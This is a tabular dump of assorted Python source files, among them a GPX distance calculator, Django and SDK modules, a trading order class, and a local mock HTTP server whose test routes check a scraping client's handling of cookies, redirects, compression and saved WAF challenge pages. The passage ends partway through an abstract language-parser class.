content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
#!/usr/bin/env python3
from argparse import ArgumentParser, Namespace
from datetime import date, datetime
from lxml import etree
from geopy.distance import vincenty
def main(arguments: Namespace):
aggregated_total_distance = sum(
track_distance(gpx_file)
for gpx_file in arguments.gpx_files)
print('Total distance in kilometers:', aggregated_total_distance)
def track_distance(gpx_file_path: str):
"""Calculate the total distance of a GPX track."""
root = etree.parse(gpx_file_path).getroot()
points = root.findall('*//trkpt', root.nsmap)
distance = sum(
vincenty(
(first.get('lat'), first.get('lon')),
(second.get('lat'), second.get('lon'))
).kilometers
for first, second in zip(
points[0:], points[1:])
)
return distance
def track_day(gpx_file_path: str) -> date:
"""
Determine the day of a GPX file.
"""
root = etree.parse(gpx_file_path).getroot()
points = root.findall('*//trkpt/time', root.nsmap)
assert points, 'empty GPX file provided {}'.format(gpx_file_path)
times = {
datetime.fromisoformat(point.text[:10]).date()
for point in points
}
assert len(times) == 1, 'GPX spans multiple days {}'.format(gpx_file_path)
return times.pop()
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('gpx_files', nargs='+')
main(parser.parse_args())
|
python
|
from django.contrib import admin
from .models import Tutorial, Complemento
admin.site.register(Tutorial)
admin.site.register(Complemento)
|
python
|
# Generated by Django 2.1.3 on 2019-06-23 15:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pdfmerge', '0013_auto_20190623_1536'),
]
operations = [
migrations.AlterField(
model_name='pdfformfield',
name='field_choice',
field=models.CharField(choices=[('NONE', 'NONE'), ('FULLDATE', 'FULLDATE'), ('DATE', 'DATE'), ('MONTH', 'MONTH'), ('YEAR', 'YEAR'), ('FULLDATE_TEXT_MONTH', 'FULLDATE_TEXT_MONTH'), ('CHECK_BOX', 'CHECK_BOX')], default='NONE', max_length=20),
),
migrations.AlterField(
model_name='pdfformfield',
name='font_size',
field=models.IntegerField(default=12),
),
]
|
python
|
# (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
try:
# Agent5 compatibility layer
from checks.libs.win.pdhbasecheck import PDHBaseCheck
from checks.libs.win.winpdh import WinPDHCounter
except ImportError:
from .winpdh_base import PDHBaseCheck
from .winpdh import WinPDHCounter
__all__ = [
'PDHBaseCheck',
'WinPDHCounter',
]
|
python
|
from __future__ import print_function
from __future__ import absolute_import
import cv2
from .tesisfunctions import Plotim,overlay,padVH
import numpy as np
from RRtoolbox.lib.plotter import Imtester
# http://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_imgproc/py_morphological_ops/py_morphological_ops.html
# http://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_imgproc/py_filtering/py_filtering.html
# http://people.csail.mit.edu/sparis/bf_course/
if __name__=="__main__":
#img= cv2.resize(cv2.imread(r"asift2fore.png"),(400,400))
img = cv2.resize(cv2.imread(r'im1_2.jpg'),(400,400))
#img = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
#img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
test = Imtester(img)
print(test.info)
|
python
|
"""Bank module message types."""
from __future__ import annotations
import copy
from typing import List
from secret_sdk.core import AccAddress, Coins
from secret_sdk.core.msg import Msg
from secret_sdk.util.json import JSONSerializable, dict_to_data
__all__ = ["MsgSend", "MsgMultiSend", "MultiSendIO"]
import attr
@attr.s
class MsgSend(Msg):
"""Send tokens message
Args:
from_address: address of sender
to_address: address of recipient
coins: coins to be sent.
"""
type = "cosmos-sdk/MsgSend"
""""""
from_address: AccAddress = attr.ib()
to_address: AccAddress = attr.ib()
amount: Coins = attr.ib(converter=Coins, factory=Coins)
def to_data(self) -> dict:
d = copy.deepcopy(self.__dict__)
return {"type": self.type, "value": dict_to_data(d)}
@classmethod
def from_data(cls, data: dict) -> MsgSend:
data = data["value"]
return cls(
from_address=data["from_address"],
to_address=data["to_address"],
amount=Coins.from_data(data["amount"]),
)
@attr.s
class MultiSendIO(JSONSerializable):
"""Organizes data for MsgMultiSend input/outputs. Expects data to be provided in the
format:
.. code-block:: python
{
"address": "secret1...",
"coins": "123456789uscrt"
}
"""
address: AccAddress = attr.ib()
"""Input / output address."""
coins: Coins = attr.ib(converter=Coins)
"""Coins to be sent / received."""
@classmethod
def from_data(cls, data: dict):
return cls(address=data["address"], coins=Coins.from_data(data["coins"]))
def convert_io_list(data: list) -> List[MultiSendIO]:
if all(isinstance(x, MultiSendIO) for x in data):
return data
else:
return [MultiSendIO(address=d["address"], coins=d["coins"]) for d in data]
@attr.s
class MsgMultiSend(Msg):
"""Allows batch-sending between multiple source and destination addresses.
The total amount of coins in ``inputs`` must match ``outputs``. The transaction
containing ``MsgMultiSend`` must contain signatures from all addresses used as inputs.
The ``inputs`` and ``output`` arguments should be of the form:
.. code-block:: python
[{
"address": "secret1...",
"coins": "123456789uusd"
},
{
"address": "secret12...",
"coins": "2983298ukrw,21323uusd"
}]
Args:
inputs (List[MultiSendIO]): senders and amounts
outputs (List[MultiSendIO]): recipients and amounts
"""
type = "bank/MsgMultiSend"
""""""
action = "multisend"
""""""
inputs: List[MultiSendIO] = attr.ib(converter=convert_io_list)
outputs: List[MultiSendIO] = attr.ib(converter=convert_io_list)
@classmethod
def from_data(cls, data: dict) -> MsgMultiSend:
data = data["value"]
return cls(
inputs=[MultiSendIO.from_data(x) for x in data["inputs"]],
outputs=[MultiSendIO.from_data(x) for x in data["outputs"]],
)
|
python
|
from datetime import datetime
import numpy as np
from pixiu.api.defines import (OrderCommand)
from pixiu.api.utils import (parse_datetime_string)
class Order(object):
def __init__(self, params={'volume': 0}):
self.order_dict = params.copy()
open_time = self.order_dict.get("open_time", None)
if open_time is not None:
if isinstance(open_time, int) or isinstance(open_time, float):
self.order_dict["open_time"] = datetime.fromtimestamp(open_time)
else:
self.order_dict["open_time"] = parse_datetime_string(open_time)
close_time = self.order_dict.get("close_time", None)
if close_time is not None:
if isinstance(close_time, int) or isinstance(close_time, float):
self.order_dict["close_time"] = datetime.fromtimestamp(close_time)
else:
self.order_dict["close_time"] = parse_datetime_string(close_time)
self.order_dict["commission"] = self.order_dict.get("commission", 0.0)
self.order_dict["swap"] = self.order_dict.get("swap", 0.0)
#cmd upper
cmd = self.order_dict.get("cmd", None)
if cmd is not None:
self.order_dict["cmd"] = cmd.upper()
def clone(self):
return Order(self.order_dict.copy())
def is_long(self) -> bool:
long_types = [OrderCommand.BUY, OrderCommand.BUYLIMIT, OrderCommand.BUYSTOP]
# cmd = self.cmd.upper()
return self.cmd in long_types
def is_short(self) -> bool:
long_types = [OrderCommand.SELL, OrderCommand.SELLLIMIT, OrderCommand.SELLSTOP]
# cmd = self.cmd.upper()
return self.cmd in long_types
def is_market(self) -> bool:
market_types = [OrderCommand.BUY, OrderCommand.SELL]
# cmd = self.cmd.upper()
return self.cmd in market_types
def is_stop(self) -> bool:
stop_types = [OrderCommand.BUYSTOP, OrderCommand.SELLSTOP]
# cmd = self.cmd.upper()
return self.cmd in stop_types
def is_limit(self) -> bool:
limit_types = [OrderCommand.BUYLIMIT, OrderCommand.SELLLIMIT]
# cmd = self.cmd.upper()
return self.cmd in limit_types
def is_pending(self) -> bool:
return self.is_limit() or self.is_stop()
@property
def uid(self) -> str:
return str(self.order_dict["uid"])
@property
def ticket(self) -> str:
return str(self.order_dict.get("order_id", self.order_dict.get("ticket", None)))
@property
def profit(self) -> float:
return float(self.order_dict.get("profit", 0))
@property
def margin(self) -> float:
return float(self.order_dict.get("margin", None))
@property
def take_profit(self) -> float:
value = self.order_dict.get("take_profit", None)
if value is None:
return None
return float(value)
@property
def stop_loss(self) -> float:
value = self.order_dict.get("stop_loss", None)
if value is None:
return None
return float(value)
@property
def comment(self):
return self.order_dict["comment"]
@property
def symbol(self):
return str(self.order_dict["symbol"])
@property
def cmd(self):
return str(self.order_dict["cmd"])
@property
def volume(self) -> float:
return float(self.order_dict["volume"])
@property
def commission(self) -> float:
return float(self.order_dict["commission"])
@property
def swap(self) -> float:
return float(self.order_dict["swap"])
@property
def magic_number(self) -> float:
ret = self.order_dict.get("magic_number", None)
return int(ret) if ret is not None else None
@property
def open_price(self) -> float:
return float(self.order_dict["open_price"])
@property
def open_time(self):
return self.order_dict["open_time"]
@property
def close_time(self):
return self.order_dict["close_time"]
@property
def close_price(self):
return self.order_dict["close_price"] if self.order_dict["close_price"] is not None and not np.isnan(self.order_dict["close_price"]) else None
@property
def description(self):
return self.order_dict["description"]
@property
def from_uid(self) -> str:
return self.order_dict.get("from_uid", None)
@property
def to_uid(self) -> str:
return self.order_dict.get("to_uid", None)
@property
def group_uid(self) -> str:
return self.order_dict.get("group_uid", None)
@property
def tags(self) -> str:
return self.order_dict.get("tags", None)
|
python
|
import numpy as np
def eval_q2m(scores, q2m_gts):
'''
Image -> Text / Text -> Image
Args:
scores: (n_query, n_memory) matrix of similarity scores
q2m_gts: list, each item is the positive memory ids of the query id
Returns:
scores: (recall@1, 5, 10, median rank, mean rank)
gt_ranks: the best ranking of ground-truth memories
'''
n_q, n_m = scores.shape
gt_ranks = np.zeros((n_q, ), np.int32)
for i in range(n_q):
s = scores[i]
sorted_idxs = np.argsort(-s)
rank = n_m
for k in q2m_gts[i]:
tmp = np.where(sorted_idxs == k)[0][0]
if tmp < rank:
rank = tmp
gt_ranks[i] = rank
# compute metrics
r1 = 100 * len(np.where(gt_ranks < 1)[0]) / n_q
r5 = 100 * len(np.where(gt_ranks < 5)[0]) / n_q
r10 = 100 * len(np.where(gt_ranks < 10)[0]) / n_q
medr = np.median(gt_ranks) + 1
meanr = gt_ranks.mean() + 1
return (r1, r5, r10, medr, meanr)
|
python
|
import traceback
import uuid
import socket
import logging
import os
import base64
import zlib
import gzip
import time
import datetime
from http import cookies
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from threading import Thread
import WebRequest
def capture_expected_headers(expected_headers, test_context, is_chromium=False, is_selenium_garbage_chromium=False, is_annoying_pjs=False, skip_header_checks=False):
# print("Capturing expected headers:")
# print(expected_headers)
assert isinstance(expected_headers, dict), "expected_headers must be a dict. Passed a %s" & type(expected_headers)
for key, val in expected_headers.items():
assert isinstance(key, str)
assert isinstance(val, str)
cookie_key = uuid.uuid4().hex
log = logging.getLogger("Main.TestServer")
sucuri_reqs_1 = 0
sucuri_reqs_2 = 0
sucuri_reqs_3 = 0
class MockServerRequestHandler(BaseHTTPRequestHandler):
def log_message(self, format, *args):
return
def validate_headers(self):
for key, value in expected_headers.items():
if (is_annoying_pjs or is_selenium_garbage_chromium or skip_header_checks) and key == 'Accept-Encoding':
# So PhantomJS monkeys with accept-encoding headers
# Just ignore that particular header, I guess.
pass
# Selenium is fucking retarded, and I can't override the user-agent
# and other assorted parameters via their API at all.
elif (is_selenium_garbage_chromium or skip_header_checks) and key == 'Accept-Language':
pass
elif (is_annoying_pjs or is_chromium or is_selenium_garbage_chromium or skip_header_checks) and key == 'Accept':
pass
elif not skip_header_checks:
v1 = value.replace(" ", "")
v2 = self.headers[key]
if v2 is None:
v2 = ""
v2 = v2.replace(" ", "")
test_context.assertEqual(v1, v2, msg="Mismatch in header parameter '{}' : '{}' -> '{}' ({})".format(
key,
value,
self.headers[key],
{
'is_annoying_pjs' : is_annoying_pjs,
'is_chromium' : is_chromium,
'is_selenium_garbage_chromium' : is_selenium_garbage_chromium,
'skip_header_checks' : skip_header_checks,
},
)
)
def _get_handler(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
# print("Path: ", self.path)
# print("Headers: ", self.headers)
# print("Cookie(s): ", self.headers.get_all('Cookie', failobj=[]))
try:
self.validate_headers()
except Exception:
self.send_response(500)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"Headers failed validation!")
raise
if self.path == "/":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"Root OK?")
elif self.path == "/favicon.ico":
self.send_response(404)
self.end_headers()
elif self.path == "/raw-txt":
self.send_response(200)
self.send_header('Content-type', "text/plain")
self.end_headers()
self.wfile.write(b"Root OK?")
elif self.path == "/html-decode":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"Root OK?")
elif self.path == "/html/real":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><body>Root OK?</body></html>")
elif self.path == "/compressed/deflate":
self.send_response(200)
self.send_header('Content-Encoding', 'deflate')
self.send_header('Content-type', "text/html")
self.end_headers()
inb = b"Root OK?"
cobj = zlib.compressobj(wbits=-zlib.MAX_WBITS)
t1 = cobj.compress(inb) + cobj.flush()
self.wfile.write(t1)
elif self.path == "/compressed/gzip":
self.send_response(200)
self.send_header('Content-Encoding', 'gzip')
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(gzip.compress(b"Root OK?"))
elif self.path == "/json/invalid":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"LOLWAT")
elif self.path == "/json/valid":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b'{"oh" : "hai"}')
elif self.path == "/json/no-coding":
self.send_response(200)
self.end_headers()
self.wfile.write(b'{"oh" : "hai"}')
elif self.path == "/filename/path-only.txt":
self.send_response(200)
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename/path-only-trailing-slash/":
self.send_response(200)
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename/content-disposition":
self.send_response(200)
self.send_header('Content-Disposition', "filename=lolercoaster.txt")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/path-only.txt":
self.send_response(200)
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition":
self.send_response(200)
self.send_header('Content-Disposition', "filename=lolercoaster.txt")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-html-suffix":
self.send_response(200)
self.send_header('Content-Disposition', "filename=lolercoaster.html")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-quotes-1":
self.send_response(200)
self.send_header('Content-Disposition', "filename='lolercoaster.html'")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-quotes-2":
self.send_response(200)
self.send_header('Content-Disposition', "filename=\'lolercoaster.html\'")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-quotes-spaces-1":
self.send_response(200)
self.send_header('Content-Disposition', "filename='loler coaster.html'")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-quotes-spaces-2":
self.send_response(200)
self.send_header('Content-Disposition', "filename=\"loler coaster.html\"")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/explicit-html-mime":
self.send_response(200)
self.send_header('Content-Disposition', "filename=lolercoaster.html")
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/redirect/bad-1":
self.send_response(302)
self.end_headers()
elif self.path == "/redirect/bad-2":
self.send_response(302)
self.send_header('location', "bad-2")
self.end_headers()
elif self.path == "/redirect/bad-3":
self.send_response(302)
self.send_header('location', "gopher://www.google.com")
self.end_headers()
elif self.path == "/redirect/from-1":
self.send_response(302)
self.send_header('location', "to-1")
self.end_headers()
elif self.path == "/redirect/to-1":
self.send_response(200)
self.end_headers()
self.wfile.write(b"Redirect-To-1")
elif self.path == "/redirect/from-2":
self.send_response(302)
self.send_header('uri', "to-2")
self.end_headers()
elif self.path == "/redirect/to-2":
self.send_response(200)
self.end_headers()
self.wfile.write(b"Redirect-To-2")
elif self.path == "/redirect/from-3":
self.send_response(302)
newurl = "http://{}:{}".format(self.server.server_address[0], self.server.server_address[1])
self.send_header('uri', newurl)
self.end_headers()
elif self.path == "/password/expect":
# print("Password")
# print(self.headers)
self.send_response(200)
self.end_headers()
if not 'Authorization' in self.headers:
self.wfile.write(b"Password not sent!!")
return
val = self.headers['Authorization']
passval = val.split(" ")[-1]
passstr = base64.b64decode(passval)
if passstr == b'lol:wat':
self.wfile.write(b"Password Ok?")
else:
self.wfile.write(b"Password Bad!")
elif self.path == "/content/have-title":
self.send_response(200)
self.end_headers()
self.wfile.write(b"<html><head><title>I can haz title?</title></head><body>This page has a title!</body></html>")
elif self.path == "/content/no-title":
self.send_response(200)
self.end_headers()
self.wfile.write(b"<html><head></head><body>This page has no title. Sadface.jpg</body></html>")
elif self.path == "/binary_ctnt":
self.send_response(200)
self.send_header('Content-type', "image/jpeg")
self.end_headers()
self.wfile.write(b"Binary!\x00\x01\x02\x03")
elif self.path == "/binary_ctnt":
self.send_response(200)
self.send_header('Content-type', "image/jpeg")
self.end_headers()
self.wfile.write(b"Binary!\x00\x01\x02\x03")
##################################################################################################################################
# Cookie stuff
##################################################################################################################################
elif self.path == '/cookie_test':
cook = cookies.SimpleCookie()
cook['cookie_test_key'] = cookie_key
cook['cookie_test_key']['path'] = "/"
cook['cookie_test_key']['domain'] = ""
expiration = datetime.datetime.now() + datetime.timedelta(days=30)
cook['cookie_test_key']["expires"] = expiration.strftime("%a, %d-%b-%Y %H:%M:%S PST")
self.send_response(200)
self.send_header('Content-type', "text/html")
self.send_header('Set-Cookie', cook['cookie_test_key'].OutputString())
self.end_headers()
self.wfile.write(b"<html><body>CF Cookie Test</body></html>")
elif self.path == '/cookie_require':
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'cookie_test_key' and cook_value == cookie_key:
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><body>Cookie forwarded properly!</body></html>")
return
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><body>Cookie is missing</body></html>")
##################################################################################################################################
# Sucuri validation
##################################################################################################################################
elif self.path == '/sucuri_shit_3':
# I'd like to get this down to just 2 requests (cookie bounce, and fetch).
# Doing that requires pulling html content out of chromium, though.
# Annoying.
nonlocal sucuri_reqs_3
sucuri_reqs_3 += 1
if sucuri_reqs_3 > 3:
raise RuntimeError("Too many requests to sucuri_shit_3 (%s)!" % sucuri_reqs_3)
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'sucuri_cloudproxy_uuid_6293e0004' and cook_value == '04cbb56494ebedbcd19a61b2d728c478':
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target preemptive Sucuri page!</title></head><body>Preemptive waf circumvented OK (p3)?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'sucuri_garbage.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(plain_contents)
elif self.path == '/sucuri_shit_2':
# This particular path is the one we should already have a cookie for.
# As such, we expect one request only
nonlocal sucuri_reqs_2
sucuri_reqs_2 += 1
if sucuri_reqs_2 > 1:
raise RuntimeError("Too many requests to sucuri_shit_2 (%s)!" % sucuri_reqs_2)
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'sucuri_cloudproxy_uuid_6293e0004' and cook_value == '04cbb56494ebedbcd19a61b2d728c478':
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target preemptive Sucuri page!</title></head><body>Preemptive waf circumvented OK (p2)?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'sucuri_garbage.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(plain_contents)
elif self.path == '/sucuri_shit':
nonlocal sucuri_reqs_1
sucuri_reqs_1 += 1
if sucuri_reqs_1 > 4:
raise RuntimeError("Too many requests to sucuri_shit (%s)!" % sucuri_reqs_1)
# print("Fetch for ", self.path)
# print("Cookies:", self.headers.get_all('Cookie', failobj=[]))
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'sucuri_cloudproxy_uuid_6293e0004' and cook_value == '04cbb56494ebedbcd19a61b2d728c478':
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target Sucuri page!</title></head><body>Sucuri Redirected OK?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'sucuri_garbage.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(plain_contents)
##################################################################################################################################
# Cloudflare validation
##################################################################################################################################
elif self.path == '/cloudflare_under_attack_shit_2':
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'cloudflare_validate_key' and cook_value == cookie_key:
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target CF page!</title></head><body>CF Redirected OK?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'cf_js_challenge_03_12_2018.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.server_version = "cloudflare is garbage"
self.send_response(503)
self.send_header('Server', "cloudflare is garbage")
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(plain_contents)
elif self.path == '/cloudflare_under_attack_shit':
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'cloudflare_validate_key' and cook_value == cookie_key:
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target CF page!</title></head><body>CF Redirected OK?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'cf_js_challenge_03_12_2018.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.server_version = "cloudflare is garbage"
self.send_response(503)
self.send_header('Server', "cloudflare is garbage")
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(plain_contents)
elif self.path == '/cdn-cgi/l/chk_jschl?jschl_vc=427c2b1cd4fba29608ee81b200e94bfa&pass=1543827239.915-44n9IE20mS&jschl_answer=9.66734594':
cook = cookies.SimpleCookie()
cook['cloudflare_validate_key'] = cookie_key
cook['cloudflare_validate_key']['path'] = "/"
cook['cloudflare_validate_key']['domain'] = ""
expiration = datetime.datetime.now() + datetime.timedelta(days=30)
cook['cloudflare_validate_key']["expires"] = expiration.strftime("%a, %d-%b-%Y %H:%M:%S PST")
self.send_response(200)
self.send_header('Content-type', "text/html")
self.send_header('Set-Cookie', cook['cloudflare_validate_key'].OutputString())
self.end_headers()
body = "<html><body>Setting cookies.<script>window.location.href='/cloudflare_under_attack_shit'</script></body></html>"
self.wfile.write(body.encode("utf-8"))
##################################################################################################################################
# Handle requests for an unknown path
##################################################################################################################################
else:
test_context.assertEqual(self.path, "This shouldn't happen!")
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
log.info("Request for URL path: '%s'", self.path)
# print("Headers: ", self.headers)
# print("Cookie(s): ", self.headers.get_all('Cookie', failobj=[]))
try:
return self._get_handler()
except Exception as e:
log.error("Exception in handler!")
for line in traceback.format_exc().split("\n"):
log.error(line)
raise e
return MockServerRequestHandler
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
def start_server(assertion_class,
from_wg,
port_override = None,
is_chromium = None,
is_selenium_garbage_chromium = False,
is_annoying_pjs = False,
skip_header_checks = False
):
# Configure mock server.
if port_override:
mock_server_port = port_override
else:
mock_server_port = get_free_port()
expected_headers = dict(from_wg.browserHeaders)
print(from_wg)
print(expected_headers)
assert isinstance(expected_headers, dict)
captured_server = capture_expected_headers(
expected_headers = expected_headers,
test_context = assertion_class,
is_chromium = is_chromium,
is_selenium_garbage_chromium = is_selenium_garbage_chromium,
is_annoying_pjs = is_annoying_pjs,
skip_header_checks = skip_header_checks
)
retries = 4
for x in range(retries + 1):
try:
mock_server = HTTPServer(('0.0.0.0', mock_server_port), captured_server)
break
except OSError:
time.sleep(0.2)
if x >= retries:
raise
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
mock_server_thread = Thread(target=mock_server.serve_forever)
mock_server_thread.setDaemon(True)
mock_server_thread.start()
return mock_server_port, mock_server, mock_server_thread
if __name__ == '__main__':
wg = WebRequest.WebGetRobust()
srv = start_server(
assertion_class = None,
from_wg = wg,
skip_header_checks = True)
print("running server on port: ", srv)
while 1:
time.sleep(1)
|
python
|
import json
from concurrent.futures import ThreadPoolExecutor
import psutil
from notebook.base.handlers import IPythonHandler
from tornado import web
from tornado.concurrent import run_on_executor
try:
# Traitlets >= 4.3.3
from traitlets import Callable
except ImportError:
from .utils import Callable
class ApiHandler(IPythonHandler):
executor = ThreadPoolExecutor(max_workers=5)
@web.authenticated
async def get(self):
"""
Calculate and return current resource usage metrics
"""
config = self.settings["jupyter_resource_usage_display_config"]
cur_process = psutil.Process()
all_processes = [cur_process] + cur_process.children(recursive=True)
# Get memory information
rss = sum([p.memory_info().rss for p in all_processes])
if callable(config.mem_limit):
mem_limit = config.mem_limit(rss=rss)
else: # mem_limit is an Int
mem_limit = config.mem_limit
limits = {"memory": {"rss": mem_limit}}
if config.mem_limit and config.mem_warning_threshold != 0:
limits["memory"]["warn"] = (mem_limit - rss) < (
mem_limit * config.mem_warning_threshold
)
metrics = {"rss": rss, "limits": limits}
# Optionally get CPU information
if config.track_cpu_percent:
cpu_count = psutil.cpu_count()
cpu_percent = await self._get_cpu_percent(all_processes)
if config.cpu_limit != 0:
limits["cpu"] = {"cpu": config.cpu_limit}
if config.cpu_warning_threshold != 0:
limits["cpu"]["warn"] = (config.cpu_limit - cpu_percent) < (
config.cpu_limit * config.cpu_warning_threshold
)
metrics.update(cpu_percent=cpu_percent, cpu_count=cpu_count)
self.write(json.dumps(metrics))
@run_on_executor
def _get_cpu_percent(self, all_processes):
def get_cpu_percent(p):
try:
return p.cpu_percent(interval=0.05)
# Avoid littering logs with stack traces complaining
# about dead processes having no CPU usage
except:
return 0
return sum([get_cpu_percent(p) for p in all_processes])
|
python
|
NOT_CONTINUATION = -1
CONTINUATION_START = 0
CONTINUATION = 1
CONTINUATION_END = 2
CONTINUATION_EXPLICIT = 3
#A function that returns the correct set of language regex expressions for functions
#and function like objects.
class languageSwitcher(object):
def __init__(self, ext):
self.lang = ""
self.extensions = ext
def getLanguage(self):
return self.lang
def getExtensions(self):
'''
Return the set of file extensions associated with this language.
'''
return self.extensions
#--- -> boolean
#Returns true if this is a recognized language that has classes,
#and false if it is a recognized language that doesn't contain classes.
def isObjectOrientedLanguage(self):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Grab regexes associated with function expressions in our language
def getFunctionRegexes(self):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#For preprocessing lines that might be functions
def cleanFunctionLine(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Given a well formed line matched against one of our language's
#regular expression, retrieve the function name.
def parseFunctionName(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#For preprocessing lines that might be classes
def cleanClassLine(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Is this name a valid class name by the rules for our language?
def isValidClassName(self, classContext):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get regexes associated with class declarations in our language
def getClassRegexes(self):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#For preprocessing lines that might be constructors or Destructors
def cleanConstructorOrDestructorLine(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Additional cleaning for constructors + destructors
def shortenConstructorOrDestructor(self, toShorten):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get Constructor/Destructor regex
def getConstructorOrDestructorRegex(self, classContext):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get the index for the start of a block comment
def getBlockCommentStart(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get the index for the end of a block comment
def getBlockCommentEnd(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
def isBlockCommentStart(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
def isBlockCommentEnd(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
def beforeBlockCommentStart(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
def afterBlockCommentEnd(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get the indicator for the start of a single line comment
def getSingleComment(self):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Clean a line of all single line comments with start + end designation
def cleanSingleLineBlockComment(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Clean a line of all single line comments
def cleanSingleLineComment(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Have we hit something that should never be in the function pattern? (maybe a ';'')
def checkForFunctionReset(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Reset the function name after we have identified a scope change.
def resetFunctionName(self, line):
